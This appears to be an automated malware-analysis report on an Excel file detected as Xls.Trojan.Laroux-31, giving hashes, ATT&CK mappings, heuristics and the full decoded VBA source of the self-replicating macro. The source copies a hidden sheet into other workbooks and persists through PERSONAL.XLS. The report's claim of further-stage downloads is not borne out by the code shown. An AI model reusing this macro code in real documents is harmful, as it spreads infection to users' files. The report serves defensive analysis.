Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 96eee25bd64dcace…

MALICIOUS

Office (OLE)

Size: 34.5 KB
Created: 1999-02-08 09:24:15
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: d9149769064c0cd37ef19097b5d81257
SHA-1: 65f47c093de43e37b50c111051059e815517f482
SHA-256: 96eee25bd64dcacee90944b613a58cd83dc030098d0a673c2e58efaef0930b83
Risk score: 180

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The critical ClamAV detection indicates this is a known malicious Excel file, identified as Xls.Trojan.Laroux-31. The presence of an Auto_Open VBA macro means the macro code runs automatically when the document is opened, without further user interaction. The script appears designed to establish persistence by copying itself into the Excel startup folder and potentially downloading further stages, as indicated by its handling of `PERSONAL.XLS` and the `Auto_Search` subroutine.

Heuristics (3)

  • ClamAV: Xls.Trojan.Laroux-31 (severity: critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.Laroux-31
  • VBA macros detected (severity: medium, 1 related finding, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Auto_Open macro (severity: high, OLE_VBA_AUTO)
    Auto_Open macro present

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1866 bytes
SHA-256: 7767f556eaa88900692c23212c95dfe08fc5dea9787fd64fa8adcbc9c8b0099f
Detection: ClamAV: Xls.Trojan.Laroux-31
Obfuscation or payload: unlikely

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Mars"








Public AllOkey
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.OnSheetActivate = "Auto_Search"
End Sub

Sub Auto_Search()
Attribute Auto_Search.VB_ProcData.VB_Invoke_Func = " \n14"
    AuLoad$ = "PERSONAL.XLS"
    AuName$ = "Mars"
    AcName$ = ActiveWorkbook.Name
    AsName$ = Workbooks(AcName$).Sheets(1).Name
    If ActiveWorkbook.Modules.Count = 0 Then
        If Not AsName$ = AuName$ Then
            Application.ScreenUpdating = False
            Workbooks(AuLoad$).Sheets(AuName$).Copy Before:= _
            Workbooks(AcName$).Sheets(1)
            Workbooks(AcName$).Sheets(AuName$).Visible = False
            Application.ScreenUpdating = True
            Application.OnSheetActivate = AuLoad$ + "!" + "Auto_Search"
        End If
    ElseIf Not AllOkey Then
        AcPath$ = ActiveWorkbook.Path
        AsPath$ = Application.StartupPath
        AsFind$ = Dir(AsPath$ & "/" & AuLoad$)
        AllOkey = True
        If AsFind$ <> AuLoad$ Then
            Application.ScreenUpdating = False
            Sheets(AuName$).Visible = True
            Sheets(AuName$).Select
            Sheets(AuName$).Copy
            With ActiveWorkbook
                .Title = ""
                .Subject = ""
                .Author = ""
                .Keywords = ""
                .Comments = ""
            End With
            AcCopy$ = ActiveWorkbook.Name
            AcPath$ = CurDir()
            ChDir AsPath$

            ChDir AcPath$
            Workbooks(AcName$).Sheets(AuName$).Visible = False
            Application.ScreenUpdating = True
            Application.OnSheetActivate = AuLoad$ + "!" + "Auto_Search"
        End If
    End If
End Sub
'                                           Bengkalis, 10 January 1997